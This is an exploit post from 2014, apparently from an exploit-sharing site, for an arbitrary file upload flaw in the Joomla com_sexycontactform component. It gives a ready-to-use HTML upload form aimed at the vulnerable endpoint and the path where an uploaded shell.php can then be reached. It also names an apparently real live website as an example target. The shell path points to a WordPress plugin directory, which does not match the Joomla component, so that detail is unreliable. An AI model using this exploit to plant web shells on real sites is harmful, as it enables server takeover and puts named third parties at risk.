facebook facebook twitter rss

Joomla com_sexycontactform Arbitrary File Upload

Author: jinja , Published: 26-10-2014
############################################################################

# Title : Joomla com_sexycontactform Arbitrary File Upload

# Author : jinja a.k.a mukrim-shine

# Date : 25 October 2014

# Facebook : http://www.facebook.com/x.jinja

# Category : Web Applications

# Greetz : SultanHaikal | Netter | Pod0lz007 | ViruzTomcat | Haji Pahonah | JemsX | Index Php | DevilScreaM

# Vulnerabillity : Arbitrary File Upload

# Google Dork : use ur brain :p


############################################################################


Bug Location : components/com_sexycontactform/fileupload/index.php

Exploit/Code :

<form method="POST" action="http://target.com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Then the file is accessible under

http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php

Example :

http://vacationsforheroes.com//components/com_sexycontactform/fileupload/index.php

Like us on Facebook :